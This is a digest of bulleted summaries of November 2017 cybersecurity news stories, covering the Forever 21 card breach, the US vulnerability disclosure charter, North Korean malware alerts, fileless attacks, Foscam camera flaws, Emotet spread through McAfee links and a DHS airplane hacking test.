Forever 21 Informs Customers of a Potential Data Breach*:
- Forever 21 announced that an unidentified third party told the clothier that there may have been unauthorized access to data from payment cards that were used at certain stores.
- They began an investigation of their payment card systems, brought in a security and forensics firm to help out, and informed customers.
- The retailer doesn’t appear to know much, including whether or not anybody’s payment data were actually compromised.
- Forever 21 implemented its current encryption and tokenization solutions in 2015, but and the encryption of some PoS devices in some Forever 21 stores wasn’t in operation.
- The retailer didn’t say when the encryption was non-functional, but the investigation is focusing on card transactions that took place between March and October 2017.
- Retailers are one of the most targeted industries for malware – right up there with service, healthcare, food service, education, and hotels.
- If not protected properly, PoS systems become easy targets because a single point of failure can affect thousands of people.
- PoS vendors who insist on remote access to your network should be able to answer for several key security requirements – you should be able to expect informative, educational answers from someone who holds the keys to your commercial kingdom.
- Please click on the below link to get the full list of questions PoS should be able to answer.
*Source: Naked Security, November 16, 2017
White House Releases New Charter for Using, Disclosing Security Vulnerabilities*:
- Technology experts have been demanding greater transparency on the US government's practices for handling security vulnerabilities that it learns about.
- The Trump administration responded to those calls with a new version of the so-called Vulnerability Equities Process (VEP) governing the use and disclosure of software vulnerabilities that the NSA and other government agencies might discover.
- The VEP charter provides fresh details on the process the government uses to determine whether to notify a private company about a security flaw in its products or services or to exploit it for intelligence gathering.
- It also promised annual statistics on the number of vulnerabilities the government retains for later exploitation and the number disclosed to affected vendors.
- The US government, like many other governments worldwide, routinely stockpiles vulnerability information and exploits that it discovers so the information can be used later for surveillance and law enforcement purposes.
- Under the process, most new and unknown vulnerabilities that federal agencies might discover have to go through the VEP.
- A board comprised of representatives from ten agencies is responsible for determining whether the government should disclose the vulnerabilities to the respective technology vendors so the flaws can be patched or to restrict dissemination of the information.
- Among the factors the board will consider are how broadly an affected product is being used, how easily discoverable and exploitable a flaw might be, the impact of exploitation and how easy or not it is to mitigate.
- The goal in all cases is to ensure a balance between the need to properly secure systems versus the need for government to maintain and edge in cyberspace.
*Source: Dark Reading, November 15, 2017
How North Korea Is Hacking Companies and Governments*:
- The Department of Homeland Security and the FBI issued joint alerts warning about two types of malware that North Korean hackers are allegedly using against firms across industries such as aviation, finance, telecoms, and media.
- One of them, known as FALLCHILL, has likely been in use since 2016 and allows hackers to monitor and control infected computers remotely.
- The other type of malware, Volgmer, infects computers through a technique known as spear phishing, where users get an apparently legitimate email with a link that then spreads the virus.
- Pyongyang has repeatedly denied involvement in any international cyberattacks.
- The FBI and DHS said both types of malware are associated with HIDDEN COBRA, a term the US government uses to refer to “malicious cyber activity by the North Korean government.”
- The DHS and FBI also identified dozens of IP addresses across several countries through which they believe Volgmer attacks are being routed.
- One cybersecurity specialist noted that this “highlights the need for nations to protect their infrastructure, not just for their own sake, but also to make sure they don’t become a pawn in someone else’s war game.”
*Source: CNN Tech, November 15, 2017
Fileless Attacks Surge in 2017, Security Solutions Are Not Stopping Them*:
- Fileless attacks are on the rise and are predicted to comprise 35 percent of all attacks next year, according to the Ponemon Institute.
- A new national survey suggests that this method of cyberattack is becoming more popular, and traditional antivirus solutions are doing little to stop the trend.
- After surveying 665 IT security professionals, the organizations discovered that faith in traditional file-scanning and antivirus software has become ashes in the wake of new methods of compromising PCs and networks.
- Fileless attacks dismiss traditional methods of compromise, such as downloading and executing malicious files on a victim's system, as they can be detected by security solutions.
- Instead, these attacks leverage exploits or launch scripts from memory, which can infect endpoints without leaving a trail behind.
- 70 percent of those surveyed said that the security risk to their organization has increased in the past 12 months.
- The survey results estimate that 29 percent of attacks the enterprise faced this year were fileless, up 20 percent year-on-year, and this rate is expected to rise to 35 percent in 2018.
- Lack of adequate protection was cited as the top concern with current enterprise endpoint security solutions.
- High numbers of false-positive alerts, as well as deployment & management complexity, were also considered problems that impact on security and productivity.
- Respondents believe the average cost of a successful attack is over $5 million, and when attackers manage to get through endpoint security, the amount of damage caused equates to roughly $300 per employee.
- The average enterprise company utilizes around seven types of different endpoint solutions, which can make management difficult.
- Endpoint security is undergoing a shift as traditional security systems are no longer enough in the face of fileless attacks, sophisticated ransomware, phishing campaigns, and compromise through supply chains.
*Source: ZD Net, November 15, 2017
74% Of CISOs Say Cybersecurity Hinders Productivity & Innovation*:
- Vanson Bourne conducted a survey of 500 CISOs from large enterprises in the US, UK and Germany, and the main finding was that IT security is hindering productivity and innovation across enterprises.
- A whopping 88 percent of enterprises prohibit users from using websites and applications due to security concerns, while 94 percent are investing in web proxy services to restrict what users can and can’t access.
- These restrictions do come with implications as 74 percent of CISOs said users have expressed frustration that security is preventing them from doing their job.
- As a result, IT help desks are spending an average of 572 hours a year responding to user requests and complaints regarding access to websites.
- 77 percent of CISOs say they feel stuck in a ‘catch-22’ where they’re caught between letting people work freely and keeping the enterprise safe.
- Traditional approaches to security are leading to frustrated users, unhappy CISOs, and strained relationships between workers and IT departments – all of which stifles business development, innovation, and growth.
- Application isolation could let end users click with confidence, while also keeping the organization safe.
- Application isolation puts activities often targeted by cybercriminals (downloading files, using applications, browsing the internet) into micro virtual machines, which protects the network because when these activities are initiated malware is trapped inside the container.
- This approach would allow users, IT, and security to work together to gather threat intelligence that protects the business at large.
*Source: Security Brief, October 23, 2017
Security Vulnerability In IoT Cameras Could Allow Remote Control By Hackers*:
- Newly uncovered vulnerabilities in a popular brand of indoor internet-connected cameras could be exploited by attackers in order to gain complete control of the device.
- Security issues with the Foscam C1 Indoor HD Camera could allow hackers to remotely access the device, according to researchers.
- The Foscam C1 camera is a commonly used home-monitoring devices and is sold by a number of large technology retailers.
- Issues have been discovered in the webService DDNS client code execution, firmware upgrades, softAP configuration, device-to-device communications, along with several buffer overflow vulnerabilities.
- Researchers also found the camera’s firmware upgrades could be compromised via the web management interface present on the device.
- A vulnerability also exists in the web management interface.
- Foscam Indoor IP Camera C1 Series models running system firmware version 188.8.131.52, Application Firmware Version 184.108.40.206 or Plug-In Version 220.127.116.11 are all susceptible to the vulnerabilities.
- Cisco has already informed Foscam of the vulnerabilities and the camera manufacturer has released a firmware update to resolve the issue.
- Users of affected devises should update to the new version as quickly as possible to ensure their devices are not vulnerable.
Source: ZD Net, November 14, 2017
McAfee's Own Anti-Hacking Service Exposed Users to Banking Malware*:
- Security firm McAfee has blocked access to malware that appeared to be sent from the company’s own network.
- The malware was hosted on a third-party website but was shared via a domain associated with McAfee ClickProtect, an email protection service.
- The service is meant to protect against phishing attacks, malware from links in emails, and prevent users from visiting sites that are known to be high risk.
- The link redirected users through the “cp.mcafee.com” domain and on to the malicious Word document.
- Anyone who downloaded and opened the malicious Word document would've been exposed to the Emotet banking malware.
- After it installs, the malware phones home to its command and control server where it would siphon off sensitive data, like browser and mail passwords, which could be used to hack into accounts and transfer funds.
- The malware connects to the command and control server using hard-coded IP addresses, but it uses proxies to evade detection.
- McAfee was “still working to establish the exact timeline” of events, a spokesperson said.
- Hackers have ramped up their use of the Emotet malware in recent months, and they’re increasingly resorting to sending carefully crafted emails and employing social engineering techniques.
- Users should beware of shortened or converted links and perhaps even more so when there might be assumptions that they are safe.
*Source: ZD Net, November 15, 2017
Could Terrorists Hack an Airplane? The Government Just Did*:
- A team of cyber experts at the Department of Homeland Security successfully hacked into the avionics of a commercial airplane parked at an airport as part of a test.
- The problem is that nobody with knowledge of aviation cyber security is sure of how vulnerable airplanes are to such an attack – some believe the DHS test has simply added to the confusion and created needless alarm.
- A Boeing spokesman reported that, “we witnessed the test and can say unequivocally that there was no hack of the airplane’s flight control systems.”
- There is a strong feeling among hacking experts that the full extent of the threat will remain underestimated.
- While the avionics in the latest generation of jets are designed with protections against hacking, 90 percent of commercial jets still flying lack those protections because the age of their systems prohibits upgrades.
- One researcher noted that “manufacturers and airlines don’t let researchers, even with honest intentions, get access to find a very expensive problem.”
- The exact purpose and scope of the tests performed by DHS have not been made clear, but attacking an airplane in the air is more challenging than attacking fixed infrastructure.
- An airplane’s satellite communications or other radio links could be leveraged to launch attacks, and the use of potentially vulnerable satellite communication channels has increased significantly in the last five years.
- This leads to what is potentially the gravest potential threat posed by hacking in effect, opening the possibility of remotely hijacking the controls from the pilots.
- For years, independent researchers have pointed out that the testing of avionics systems by manufacturers is confined to looking for technical flaws, not for vulnerabilities to hacking.
- The computers running an airplane’s flight controls are programmed to detect if data fed to them is anomalous and, if it is, to shut down so that the pilots can fly the airplane manually.
- No crew has yet had to grapple with the consequences of their flight control protections being breached by a hacker, nor is there any training program to prepare them for that.
- The use of hacking to attack aviation is another instance of the increasing spread of asymmetric warfare.
*Source: The Daily Beast, November 17, 2017